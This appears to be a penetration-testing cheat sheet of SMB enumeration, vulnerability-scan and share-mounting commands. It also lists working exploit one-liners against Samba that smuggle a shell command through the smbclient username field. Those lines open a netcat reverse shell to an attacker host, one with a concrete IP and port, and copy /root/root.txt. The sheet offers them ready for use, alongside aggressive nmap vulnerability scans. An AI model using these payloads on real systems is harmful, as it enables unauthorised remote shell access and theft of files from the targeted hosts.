Skip to content

SMB Enumeration

smbclient -L x.x.x.x
smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor
smbclient \\\\x.x.x.x\\share
enum4linux -a ip
rpcclient -U "" x.x.x.x  # Anonymous bind using rpcclient / Null connect
smbclient //MOUNT/share  # Connect to SMB share
smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I ip //LAME/tmp
nmap -T4 -sS -sC -Pn -A --script smb-vuln* ip
smbclient //ip/tmplogon "./=\`nohup nc -e /bin/sh LHOST LPORT\`"
smbclient -U "/=\`nohup cat /root/root.txt > /tmp/ttt\`" -N -I ip //LAME/tmp
smbclient -U "/=\`nohup nc -e /bin/sh 10.10.15.11 60000\`" -N -I ip //LAME/tmp
smbclient -L ip
enum4linux -S ip

Nmap SMB Script Scan

  • SMB Users and Share Scan

    nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse ip

  • SMB Vulnerability Scan

    nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse ip

  • SMB Vulnerability Check with Unsafe Arguments

    nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 ip

  • SMB Vulnerability Check

    nmap --script=smb-check-vulns.nse x.x.x.x

  • Mounting an NFS share without using locks

    mount ip:/vol/share /mnt/nfs -nolock

  • Mounting a CIFS share with specified credentials and domain

    mount -t cifs -o username=user,password=pass,domain=blah //ip.X/share-name /mnt/cifs

  • Mounting a CIFS share without specifying credentials (prompt for password)

    mount -t cifs //x.x.x.x/share /mnt

  • Mounting a CIFS share with specified credentials

    - #### mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt

  • Mounting Share folder

    sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other​

Create a SMB Server

  • In kali hosting a smb server 
    impacket-smbserver ShareFolder $(pwd)
  • ​In windows 
    New-PSDrive -Name "Followme" -PSProvider "FileSystem" -Root "\\ip\ShareFolder"